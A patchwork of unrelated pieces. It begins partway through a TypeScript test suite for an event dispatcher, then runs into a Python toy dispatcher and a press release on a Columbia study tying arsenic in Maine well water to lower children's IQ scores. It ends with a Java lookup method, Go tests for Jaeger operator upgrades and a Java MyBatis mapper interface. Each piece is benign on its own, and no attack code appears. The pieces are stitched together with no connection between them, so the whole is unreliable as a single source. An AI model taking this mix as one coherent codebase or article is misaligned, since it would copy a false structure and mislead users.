        eventDispatcher.removeEventListener('event5', handler5);
        eventDispatcher.dispatchEvent('event1');
        eventDispatcher.dispatchEvent('event2');
        eventDispatcher.dispatchEvent('event3');
        eventDispatcher.dispatchEvent('event4');
        eventDispatcher.dispatchEvent('event5');
        chai.expect(node.handler1Count).to.be.equal(2);
        chai.expect(node.handler2Count).to.be.equal(2);
        chai.expect(node.handler3Count).to.be.equal(1);
        chai.expect(handler4Count).to.be.equal(2);
        chai.expect(handler5Count).to.be.equal(1);
      });
      it('Should dispatch events with correct event detail', () => {
        const node = new IoNode2();
        const eventDispatcher = new EventDispatcher(node);
        let handler4Detail: any;
        const handler4 = (event: CustomEvent) => {
          handler4Detail = event.detail;
        };
        let handler5Detail: any;
        const handler5 = (event: CustomEvent) => {
          handler5Detail = event.detail;
        };
        eventDispatcher.applyPropListeners({'on-event3': 'handler3', 'on-event4': handler4});
        eventDispatcher.addEventListener('event5', handler5);
        eventDispatcher.dispatchEvent('event1', 'detail1');
        eventDispatcher.dispatchEvent('event2', 'detail2');
        eventDispatcher.dispatchEvent('event3', 'detail3');
        eventDispatcher.dispatchEvent('event4', 'detail4');
        eventDispatcher.dispatchEvent('event5', 'detail5');
        chai.expect(node.handler1Detail).to.be.equal('detail1');
        chai.expect(node.handler2Detail).to.be.equal('detail2');
        chai.expect(node.handler3Detail).to.be.equal('detail3');
        chai.expect(handler4Detail).to.be.equal('detail4');
        chai.expect(handler5Detail).to.be.equal('detail5');
      });
      it('Should add/remove/dispatch events on HTML elements', () => {
        const element = document.createElement('test-div-event-dispatch') as TestDivEventDispatchElement;
        const eventDispatcher = new EventDispatcher(element);
        let handler4Count = 0;
        let handler4Detail: any;
        const handler4 = (event: CustomEvent) => {
          handler4Count++;
          handler4Detail = event.detail;
        };
        let handler5Count = 0;
        let handler5Detail: any;
        const handler5 = (event: CustomEvent) => {
          handler5Count++;
          handler5Detail = event.detail;
        };
        eventDispatcher.applyPropListeners({'on-event3': 'handler3', 'on-event4': handler4});
        eventDispatcher.addEventListener('event5', handler5);
        element.dispatchEvent(new CustomEvent('event3', {detail: 'detail3'}));
        element.dispatchEvent(new CustomEvent('event4', {detail: 'detail4'}));
        element.dispatchEvent(new CustomEvent('event5', {detail: 'detail5'}));
        chai.expect(element.handler3Count).to.be.equal(1);
        chai.expect(handler4Count).to.be.equal(1);
        chai.expect(handler5Count).to.be.equal(1);
        chai.expect(element.handler3Detail).to.be.equal('detail3');
        chai.expect(handler4Detail).to.be.equal('detail4');
        chai.expect(handler5Detail).to.be.equal('detail5');
        // Remove event listeners
        eventDispatcher.applyPropListeners({});
        eventDispatcher.removeEventListener('event5', handler5);
        element.dispatchEvent(new CustomEvent('event3', {detail: 'detail3i'}));
        element.dispatchEvent(new CustomEvent('event4', {detail: 'detail4i'}));
        element.dispatchEvent(new CustomEvent('event5', {detail: 'detail5i'}));
        chai.expect(element.handler3Count).to.be.equal(1);
        chai.expect(handler4Count).to.be.equal(1);
        chai.expect(handler5Count).to.be.equal(1);
        chai.expect(element.handler3Detail).to.be.equal('detail3');
        chai.expect(handler4Detail).to.be.equal('detail4');
        chai.expect(handler5Detail).to.be.equal('detail5');
      });
      it('Should bubble events if specified', () => {
        const element = document.createElement('test-div-event-dispatch') as TestDivEventDispatchElement;
        const parentElement = document.createElement('test-div-event-dispatch') as TestDivEventDispatchElement;
        parentElement.appendChild(element);
        const eventDispatcher = new EventDispatcher(element);
        let eventCount = 0;
        parentElement.addEventListener('event', () => {
          eventCount++;
        });
        eventDispatcher.dispatchEvent('event', null, false);
        chai.expect(eventCount).to.be.equal(0);
        eventDispatcher.dispatchEvent('event', null, true);
        chai.expect(eventCount).to.be.equal(1);
        eventDispatcher.dispatchEvent('event');
        chai.expect(eventCount).to.be.equal(2);
      });
      it('Should emit event from specified target', () => {
        const element = document.createElement('div');
        const eventDispatcher = new EventDispatcher(element);
        const element2 = document.createElement('test-div-event-dispatch') as TestDivEventDispatchElement;
        const eventDispatcher2 = new EventDispatcher(element2);
        eventDispatcher2.applyPropListeners({'on-event3': 'handler3'});
        let path: any = null;
        let target: any = null;
        eventDispatcher2.addEventListener('event3', (event: CustomEvent) => {
          path = (event as any).path;
          target = (event as any).target;
        });
        eventDispatcher.dispatchEvent('event3', 'detail', false, element2);
        chai.expect(element2.handler3Detail).to.be.equal('detail');
        chai.expect(path).to.be.eql([element2]);
        chai.expect(target).to.be.eql(element2);
      });
      it('Should dispose correctly', () => {
        const node = new IoNode2();
        const eventDispatcher = new EventDispatcher(node);
        eventDispatcher.dispose();
        chai.expect(eventDispatcher.node).to.be.equal(undefined);
        chai.expect(eventDispatcher.protoListeners).to.be.equal(undefined);
        chai.expect(eventDispatcher.propListeners).to.be.equal(undefined);
        chai.expect(eventDispatcher.addedListeners).to.be.equal(undefined);
      });
    });
  }
}
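For readers new to the pattern under test, a toy dispatcher in Python sketches the add/remove/dispatch lifecycle these tests exercise (a simplification for illustration, not the iogui implementation):

class ToyEventDispatcher:
    def __init__(self):
        self._listeners = {}  # event name -> list of callables

    def add_event_listener(self, name, listener):
        self._listeners.setdefault(name, []).append(listener)

    def remove_event_listener(self, name, listener=None):
        # Omitting the listener removes all listeners for the event,
        # matching the removeEventListener('event1') call in the tests.
        if listener is None:
            self._listeners.pop(name, None)
        else:
            self._listeners.get(name, []).remove(listener)

    def dispatch_event(self, name, detail=None):
        # Copy the list so handlers can add/remove listeners while dispatching.
        for listener in list(self._listeners.get(name, [])):
            listener(detail)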
In Maine study, rates of contamination exceed WHO and EPA guidelines

A study by researchers at Columbia University reports that schoolchildren from three school districts in Maine who were exposed to arsenic in drinking water experienced declines in intelligence. While earlier studies conducted by the researchers in South Asia, and Bangladesh in particular, showed that exposure to arsenic in drinking water is negatively associated with child intelligence, this is the first study to examine intelligence against individual water arsenic exposures in the U.S. Findings are reported online in the journal Environmental Health.

The research team, led by Joseph Graziano, PhD, professor of Environmental Health Sciences at Columbia University's Mailman School of Public Health, assessed 272 children in grades 3–5 (on average, 10 years old) from three school districts in Maine where household wells are the predominant source of water for drinking and cooking. The Augusta area in particular was studied because earlier research indicated higher-than-normal exposures.

Using the Wechsler Intelligence Scale for Children (WISC-IV), the most often used assessment tool for measuring intelligence in children ages 6 to 16, the researchers found that arsenic in household water was associated with decreased scores on most WISC-IV indices. After adjusting for maternal IQ and education, characteristics of the home environment, school district, and number of siblings, children who were exposed to more than 5 parts per billion of arsenic in household well water (WAs ≥ 5 μg/L) showed reductions in Full Scale, Working Memory, Perceptual Reasoning, and Verbal Comprehension scores. These losses of 5–6 points are considered a significant decline that may translate to problems in school, according to Gail Wasserman, PhD, professor of Medical Psychology in the Department of Psychiatry at Columbia and the study's first author.

Water samples were taken at the point of entry into the home, via the garden hose connection, and at the point of consumption, the kitchen sink. The researchers also considered drinking habits, length of residence in the home, well construction, and use of filtering procedures. On average, water arsenic (WAs) levels measured at the kitchen tap were 9.88 parts per billion (9.88 μg/L), with almost a third of samples exceeding 10 μg/L, the maximum contaminant level guideline of the World Health Organization and the U.S. Environmental Protection Agency. The highest WAs level reported was 115.3 μg/L.

"The strength of associations found in this study is comparable to that of the modest increases that have been found in blood lead, an established risk factor for diminished IQ," said Dr. Graziano.

Analogous to the earlier work in Bangladesh with similarly aged children, the researchers found negative associations between water arsenic and performance that persisted after adjustment for similar socio-demographic data. However, in Bangladesh, IQ tests were slightly modified to increase cultural appropriateness, and so were not precisely the same tests as those administered in Maine. Also significant, in Bangladesh and other such countries, children's nutritional and health status, as well as their regularity of school attendance, differs from that of U.S. children. Most noteworthy, Dr. Graziano emphasizes that water arsenic concentrations in the previously studied settings ranged far higher than in these U.S. communities, but also included low levels.

"Our findings of adverse impact in a U.S. sample, particularly in performance-related functioning, give confidence to the generalizability of findings from our work in Bangladesh, where we also observed a steep drop in intelligence scores in the very low range of water arsenic concentrations," said Dr. Graziano, who is also professor of Pharmacology at Columbia's College of Physicians and Surgeons. "Collectively, our work in Bangladesh and in Maine suggests that aspects of performance intelligence, particularly perceptual reasoning and working memory, are impacted by exposure to arsenic in drinking water."

"Even though purchasing a standard filter at the hardware store is inadequate for treating well water, the good news is that there are steps one can take to ameliorate the situation," noted Dr. Graziano. Dr. Graziano and other experts recommend installing a reverse osmosis system, which, although somewhat expensive, alleviates the effects of water arsenic. A series of outreach programs is also underway to educate families in the region.

The work was supported by the National Institute of Environmental Health Sciences (grants P42 ES 10349 and P30 ES 09089). The authors declare no conflicts of interest. Additional authors include Xinhua Liu, Nancy LoIacono, Jennie Kline, Pam Factor-Litvak, Alexander van Geen, Jacob Mey, and Diane Levy, all of Columbia; Richard Abramson, formerly of Readfield, ME public schools; and Amy Schwartz of the University of New Hampshire.

About Columbia University's Mailman School of Public Health

Founded in 1922, Columbia University's Mailman School of Public Health pursues an agenda of research, education, and service to address the critical and complex public health issues affecting New Yorkers, the nation, and the world. The Mailman School is the third largest recipient of NIH grants among schools of public health. Its over 450 multidisciplinary faculty members work in more than 100 countries around the world, addressing such issues as preventing infectious and chronic diseases, environmental health, maternal and child health, health policy, climate change and health, and public health preparedness. It is a leader in public health education, with over 1,300 graduate students from more than 40 nations pursuing a variety of master's and doctoral degree programs. The Mailman School is also home to numerous world-renowned research centers, including ICAP (formerly the International Center for AIDS Care and Treatment Programs) and the Center for Infection and Immunity. For more information, please visit www.mailman.columbia.edu.
/**
 * Check if there is personal data for student with given email.
 * @param email student email
 * @return true if data is found, false if not.
 */
public boolean studentExists(String email) {
    try {
        personsTable.getRowForPerson(email);
        return true;
    } catch (DiplomaDataProvider.RequiredDataNotFoundException e) {
        return false;
    }
}
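The method above uses an exception-driven existence check; the same idiom in Python (EAFP), with persons_table and RequiredDataNotFoundError as hypothetical stand-ins for the Java types:

def student_exists(persons_table, email: str) -> bool:
    # Mirrors the Java method: presence is signaled by a successful
    # lookup, absence by the provider's not-found exception.
    try:
        persons_table.get_row_for_person(email)
        return True
    except RequiredDataNotFoundError:  # hypothetical stand-in exception
        return False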
package jaeger

import (
	"testing"

	"github.com/spf13/viper"
	"github.com/stretchr/testify/assert"
	"k8s.io/apimachinery/pkg/types"

	v1 "github.com/jaegertracing/jaeger-operator/pkg/apis/jaegertracing/v1"
)

func TestDirectNextMinor(t *testing.T) {
	viper.Set("jaeger-version", "")
	defer viper.Reset()

	// prepare
	nsn := types.NamespacedName{
		Name: "my-instance",
	}
	r := &ReconcileJaeger{}
	j := *v1.NewJaeger(nsn)
	j.Status.Version = "1.12.0"

	// test
	j, err := r.applyUpgrades(j)

	// verify
	assert.NoError(t, err)
	// we cannot make any other assumptions here, but we know that 1.12.0 is an older
	// version, so at least the status field should have been updated
	assert.NotEqual(t, "1.12.0", j.Status.Version)
}

func TestSetVersionOnNewInstance(t *testing.T) {
	// prepare
	r := &ReconcileJaeger{}
	j := *v1.NewJaeger(types.NamespacedName{Name: "my-instance"})

	// test
	j, err := r.applyUpgrades(j)

	// verify
	assert.NoError(t, err)
	// a new instance starts without a version, so applyUpgrades should set one
	assert.NotEmpty(t, j.Status.Version)
}
package com.veryoo.ssmqs.mapper;

import java.util.List;

import com.baomidou.mybatisplus.core.mapper.BaseMapper;
import com.veryoo.ssmqs.entity.Menu;

/**
 * <p>
 * Mapper interface
 * </p>
 *
 * @author oubijie
 * @since 2019-07-22
 */
public interface MenuMapper extends BaseMapper<Menu> {

    List<Menu> selectMenuByUser(String username);
}